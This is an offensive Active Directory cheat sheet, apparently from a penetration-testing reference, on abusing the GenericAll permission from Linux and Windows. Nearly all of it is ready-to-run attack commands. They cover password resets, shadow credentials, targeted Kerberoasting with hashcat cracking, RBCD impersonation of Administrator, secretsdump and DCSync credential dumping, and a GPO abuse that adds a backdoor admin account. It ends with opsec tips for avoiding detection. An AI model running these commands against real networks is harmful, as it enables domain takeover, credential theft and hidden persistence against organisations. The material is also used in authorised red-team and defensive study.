GenericAll
Source has full control over target object β equivalent to ownership
Applies to: User β User, User β Group, User β Computer, Group β any, Computer β any
Linux Abuse
Target: User β password reset
bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'
Impacket
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>
Target: User β shadow credentials (no password reset needed)
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>
Target: User β targeted Kerberoast (set SPN then roast)
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set object <target-user> servicePrincipalName -v '<spn>'
GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> -request-user <target-user> -outputfile hashes.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Target: Group β add member
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'
Target: Computer β shadow credentials β RBCD or S4U2Self
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>
# certipy outputs NT hash; use with getST.py or pass-the-hash
Target: Computer β RBCD (Resource-Based Constrained Delegation)
# 1. Get/create a computer account we control
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on target
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'
# 3. Get service ticket impersonating admin
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
# 4. Use ticket
secretsdump.py -k -no-pass <target-computer>.<domain>
Target: GPO β modify GPO via pyGPOAbuse
# GenericAll over a GPO object
python3 pygpoabuse.py <domain>/<username>:'<password>' -gpo-id '<gpo-guid>' -dc-ip <dc-ip> \
-powershell -command "net user backdoor P@ssw0rd123 /add && net localgroup administrators backdoor /add" \
-taskname 'Backdoor' -description 'update'
Target: Domain β DCSync
dacledit.py -action write -rights DCSync -principal <username> -target-dn 'DC=<domain>,DC=<tld>' \
'<domain>/<username>:<password>' -dc-ip <dc-ip>
secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
Windows Abuse
Target: User β password reset
$cred = Get-Credential # or build manually
$pass = ConvertTo-SecureString '<new-password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <target-user> -AccountPassword $pass -Credential $cred
Target: User β shadow credentials
# Whisker
Whisker.exe add /target:<target-user> /domain:<domain> /dc:<dc-ip>
# Whisker outputs Rubeus command β run it to get TGT + NT hash
Target: Group β add member
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
# or
net group "<target-group>" <username> /add /domain
Target: Computer β RBCD
# Requires PowerMad + PowerView
$AttackerSID = Get-DomainComputer 'ATTACKPC$' -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$AttackerSID)"
$SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <target-computer> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Target: GPO
# SharpGPOAbuse
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <username> --GPOName "<gpo-name>"
SharpGPOAbuse.exe --AddComputerScript --ScriptName evil.ps1 --ScriptContents "..." --GPOName "<gpo-name>"
Rubeus (shadow creds β NT hash)
Rubeus.exe asktgt /user:<target-user> /certificate:<base64-pfx> /password:<pfx-pass> /nowrap /getcredentials
Opsec
- Password resets generate event 4723/4724 (logged on DC) β noisy
- RBCD and shadow credentials are quieter; prefer them when target is a user or computer